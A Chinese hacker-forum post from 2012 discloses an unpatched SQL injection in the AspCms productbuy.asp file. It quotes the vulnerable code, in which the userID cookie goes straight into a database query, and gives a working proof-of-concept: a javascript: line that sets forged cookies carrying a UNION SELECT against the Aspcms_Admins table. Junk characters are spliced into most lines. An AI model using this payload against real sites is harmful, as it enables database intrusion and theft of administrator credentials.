好久没上土司了,上来一看发现在删号名单内.....
4 @ p) W3 g# ]5 t2 D0 a也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。. t/ ]: L, B$ O) c6 n& b# |3 k
废话不多说,看代码:: B/ i* \' H7 ^+ |3 i8 V
/ F4 X' P# N! D* V5 d
<%) B- E6 o0 O' s! C" w( }: n" z
1 ~) y; ], s4 |! i% H& i. Y
if action = "buy" then9 f) h! `( ~+ X9 z
) K8 X! B9 X9 E4 g i
addOrder()
! M* E8 |8 } r5 Q! q$ R; N! g+ b; ]1 k2 O* v- k$ s; Y
else4 H' V% N) O; r9 p) b* i9 B7 T7 b# ^
* z2 [0 A: Q9 V5 a
echoContent()
( |4 @- `' g B# O9 |
" }; c' K# _) t+ M3 B# dend if9 E7 e- r( `& H( P) }
+ S& W0 f, n, @7 b! }) e' Y& e/ r& ]/ C$ W v" F
( q/ p7 ]6 R5 D% [
……略过6 S# @9 Q: n: q
4 O" v* }( u. [: i h% k" u/ w
7 u/ P; i, ]% D+ K1 x" n v; C" |
Sub echoContent()0 l9 t E1 W+ b' H9 |
/ W, d5 V7 I* \) P6 c dim id- s( G! D; M. t
8 D. P2 J8 e; h$ y id=getForm("id","get"); ^$ w* J- g3 ^- w: t2 d0 @9 J
2 B r- \+ c) h2 k$ t
X9 v( E, G- I+ H, a& B, p! L1 L. M/ x2 _ Q, T
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
" f/ _- p2 q! G" l. W
- k3 _! N$ w) [/ H
6 {5 K8 l4 d. p* j% y' O7 N! J
1 p& }0 w9 ~1 O, j7 a9 l: r dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
$ b: c3 j. V' b6 E, ~7 A+ x/ E
S# x- o1 A' i2 ]7 F dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct9 u8 c" X! w$ a. \
, ] M' Z4 x4 `4 J5 [ W* B
Dim templatePath,tempStr
" I9 K# v2 k& s: m& t% i& G1 F$ Z
& x i: B, @0 g y7 ?7 z templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
$ g7 ^# c/ v6 w& Q* T
& K, n8 J2 k5 I3 e" s* x4 a6 ~: @4 J
& s5 p( v- s9 S& y! h set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")( T3 c! M5 K d. ^1 L" N
8 e. x8 p3 C8 z ~2 j! \0 q1 B
selectproduct=rsObj(0)
, r2 C X! e0 F/ l C6 ~
3 W7 c& q% z7 J4 _( | 7 V: H% K2 b# N$ D' |/ {
8 n2 U$ F( T& X( ?. b2 d1 @0 n
Dim linkman,gender,phone,mobile,email,qq,address,postcode
8 A8 C1 c3 E& f6 d9 s9 n8 b/ a" S, t) z: H( S6 U8 l$ G
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
3 G; ^2 F5 R. b/ O8 J& E% o" E( Y6 |8 ]
if rCookie("loginstatus")=1 then
6 B* T) L3 s2 |: l2 k% F/ d- u
Z+ V; ]% a; B6 l, M: r% }$ ? set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
- }; }1 F& g( A. q2 y4 g
& \9 \6 K7 w0 z- h: @- p linkman=rsObj("truename")
! S h" n$ \( ? q1 V/ O8 v. P* u2 M
gender=rsObj("gender")- u/ C& E3 M5 u9 ~
3 n) H% ]; Q' o- ?) S
phone=rsObj("phone")' K9 A7 u0 S; ~. s
0 Q* b Y6 Q6 {
mobile=rsObj("mobile")
, R5 j/ P8 O" C5 _2 ]+ O8 x
6 Q' w# ?$ L% q' T* w6 c email=rsObj("email"). U4 a: {/ E) Q0 m6 ^) e
5 V0 h, e- n5 G* s( n- E% H$ D1 @4 \
qq=rsObj("qq")
d8 t7 S7 m* B5 ^0 e# z4 V
2 i+ C2 t8 }8 k4 `# \7 e1 b" ]+ A address=rsObj("address")
% g X: ^3 i! `, h! e: ^( h2 ^" R2 E/ _: B
postcode=rsObj("postcode")
+ Q) u! K* }1 a/ U S: Z# o# o7 X: e r8 o& [4 c
else
T1 P7 S K; p6 C3 G( G" s. X
( R: t/ i+ D# l gender=1+ a7 D7 y, l! i- a- I1 T; N6 K
% \" m* p: Z. R- C1 j+ k end if
# h- I/ B+ F+ U- U) ]. I! a( i! f0 Z) V) a
rsObj.close()+ e" h1 i4 {- ]( [. ^: I& i& m
9 I F/ v5 _" U2 _3 G) r
) y/ \9 J7 Q; R1 n( `
& A# S5 @# E5 l" S w with templateObj 4 l- p. L& l! j+ V* r
3 t$ E9 J; ]. S7 B' w .content=loadFile(templatePath)
+ o! e/ f: Q& T: } J4 \1 R9 ^; X( [1 a
.parseHtml()2 S: x$ m& M7 r% [
0 }& L6 [: l6 v' G .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)* n3 Q4 |/ ? u8 ^9 P, V/ a
- j }. \4 x7 U+ U' y' R5 Z0 X .content=replaceStr(.content,"[aspcms:linkman]",linkman)
Z9 L& Z1 D% k) h2 K) k" T5 [
) X: I0 {* n, j$ |5 R% ` .content=replaceStr(.content,"[aspcms:gender]",gender) 9 V& L+ k2 R; q- D& L$ d9 k
& c4 W3 |4 U# `. d .content=replaceStr(.content,"[aspcms:phone]",phone) ! a6 e, d5 `, }, [0 a" Z
, H! E0 S: o( G/ B
.content=replaceStr(.content,"[aspcms:mobile]",mobile) x/ S' W& I# d: t/ j6 m& }
; q o9 i! H7 {% F! B; E
.content=replaceStr(.content,"[aspcms:email]",email) 8 h0 E) u4 M' X! R1 Z3 V: i
6 C+ F! j8 K8 S2 {6 K
.content=replaceStr(.content,"[aspcms:qq]",qq) 5 a( \( B- s& \/ f" x
! S9 c) I' G7 n4 D8 Q2 Q8 j: R .content=replaceStr(.content,"[aspcms:address]",address) % Z0 |; W5 k$ @4 I* t! |; w$ o
; T* l( |" P, b( r5 P: ^. g4 C% X7 M .content=replaceStr(.content,"[aspcms:postcode]",postcode)
; _5 Y' Z$ \9 e! h$ I* M+ L! Y3 p6 @. b5 v5 l
.parseCommon() " W7 v1 i y0 J- k
1 t J3 E6 n) j! Z: c/ o+ |
echo .content + q" e" y9 h) h( f) ?$ Y
; M+ [- ^1 n. c: k9 E% |- O
end with& {: }" k5 S+ f1 i
* k) h- A' ^9 U# k set templateobj =nothing : terminateAllObjects
3 t- R0 Q( `+ o8 t6 W- H+ |0 ?0 a4 [: ^& F ^( }( \8 \3 H% D
End Sub- D$ e( q+ T& s% l
漏洞很明显,没啥好说的
! n# M' Q$ T% h+ {poc:
7 P/ x6 T$ M; i4 H- ?6 a+ J
: O& z) X% v5 G! o2 {2 ijavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子6 {1 ~5 J0 g$ w \: p0 U& I5 B* R
8 l& ~( ]5 E$ Y" }1 ~) `- \
|
发表于 2012-12-27 08:35:05
收藏
支持
反对